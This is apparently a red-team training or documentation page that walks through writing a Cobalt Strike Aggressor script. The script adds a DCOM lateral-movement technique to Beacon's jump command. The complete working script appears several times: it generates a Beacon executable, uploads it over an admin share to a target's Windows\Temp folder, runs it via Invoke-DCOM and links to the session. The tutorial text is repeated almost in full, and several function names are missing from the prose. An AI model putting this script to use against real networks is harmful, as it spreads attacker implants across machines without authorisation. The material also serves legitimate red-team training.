Jump & Remote-Exec

PreviousMimikatz Kit NextBeacon Object Files

Last updated 2 years ago

Jump & Remote-Exec

Aggressor can be used to register new techniques under jump and remote-exec using and respectively.

In this example, we'll integrate Invoke-DCOM.ps1 into jump. First, create a new text file in Visual Studio and save is somewhere as dcom.cna. Then add the following skeleton.

sub invoke_dcom
{
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

This will register "dcom" as a new option inside the jump command and specifies invoke_dcom as the associated callback function. The first thing to add inside this callback are some local variable declarations.

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

local defines variables that are local to the current function, so they will disappear once executed. Sleep can have global, closure-specific and local scopes. More information can be found in 5.2 Scalar Scope of the Sleep manual.

The next step is to acknowledge receipt of the task using . This takes the ID of the Beacon, the text to post and an ATT&CK tactic ID. This will print a message to the Beacon console and add it to the data model used in the activity and session reports that you can generate from Cobalt Strike.

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');

    # acknowledge this command
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");
}

You'll notice $1, $2 and $3 variables here which are automatically passed in by the client. Where:

$1 is the Beacon ID.
$2 is the target to jump to.
$3 is the selected listener.

# read the script
$handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
$script = readb($handle, -1);
closef($handle);

# host the script in Beacon
$oneliner = beacon_host_script($1, $script);

If you want to see the content of these variables, you can use println($oneliner); and they'll appear in the Script Console (Cobalt Strike > Script Console).

# generate stageless payload
$payload = artifact_payload($3, "exe", "x64");

# upload to the target
bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

$+ concatenates an interpolated string and requires additional whitespaces on each end.

# run via powerpick
bpowerpick!($1, "Invoke-DCOM -ComputerName $+ $2 $+ -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

# link if p2p beacon
beacon_link($1, $2, $3);

The final script:

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');

    # acknowledge this command1
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");

    # read in the script
    $handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
    $script = readb($handle, -1);
    closef($handle);

    # host the script in Beacon
    $oneliner = beacon_host_script($1, $script);

    # generate stageless payload
    $payload = artifact_payload($3, "exe", "x64");

    # upload to the target
    bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

    # run via powerpick
    bpowerpick!($1, "Invoke-DCOM -ComputerName  $+  $2  $+  -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

    # link if p2p beacon
    beacon_link($1, $2, $3);
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

Make sure to load the script via the Script Manger (Cobalt Strike > Script Manager).

The flexibility of Aggressor means that we can leverage anything from PowerShell, execute-assembly, shellcode injection, DLL injection and more.

PreviousMimikatz Kit NextBeacon Object Files

Last updated 2 years ago

Aggressor can be used to register new techniques under jump and remote-exec using and respectively.

In this example, we'll integrate Invoke-DCOM.ps1 into jump. First, create a new text file in Visual Studio and save is somewhere as dcom.cna. Then add the following skeleton.

sub invoke_dcom
{
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');

    # acknowledge this command
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");
}

You'll notice $1, $2 and $3 variables here which are automatically passed in by the client. Where:

$1 is the Beacon ID.
$2 is the target to jump to.
$3 is the selected listener.

Furthermore, expands a listener name into a more detailed description. For example, instead of "smb" it will say "windows/beacon_bind_pipe (\\.\pipe\<pipename>)".

Next, we want to read in the Invoke-DCOM script from our machine. This can be done , and . Notice how we're assigning values to the variables we declared at the start.

# read the script
$handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
$script = readb($handle, -1);
closef($handle);

The $script variable now holds the raw content of Invoke-DCOM.ps1. For Beacon to utilise it, we can use - this will host the script inside Beacon and returns a short snippet for running it.

# host the script in Beacon
$oneliner = beacon_host_script($1, $script);

If you want to see the content of these variables, you can use println($oneliner); and they'll appear in the Script Console (Cobalt Strike > Script Console).

The next step is to generate and upload a payload to the target using and . This will generate an EXE payload and upload it to the target in the C:\Windows\Temp directory.

# generate stageless payload
$payload = artifact_payload($3, "exe", "x64");

# upload to the target
bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

$+ concatenates an interpolated string and requires additional whitespaces on each end.

Then, can execute the Invoke-DCOM oneliner. We pass it the target computer name and the path to the uploaded payload. Also, because this could be a P2P payload - we want to automatically try and link to it, which can be done with .

# run via powerpick
bpowerpick!($1, "Invoke-DCOM -ComputerName $+ $2 $+ -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

# link if p2p beacon
beacon_link($1, $2, $3);

The final script:

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');

    # acknowledge this command1
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");

    # read in the script
    $handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
    $script = readb($handle, -1);
    closef($handle);

    # host the script in Beacon
    $oneliner = beacon_host_script($1, $script);

    # generate stageless payload
    $payload = artifact_payload($3, "exe", "x64");

    # upload to the target
    bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

    # run via powerpick
    bpowerpick!($1, "Invoke-DCOM -ComputerName  $+  $2  $+  -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

    # link if p2p beacon
    beacon_link($1, $2, $3);
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

Make sure to load the script via the Script Manger (Cobalt Strike > Script Manager).

The flexibility of Aggressor means that we can leverage anything from PowerShell, execute-assembly, shellcode injection, DLL injection and more.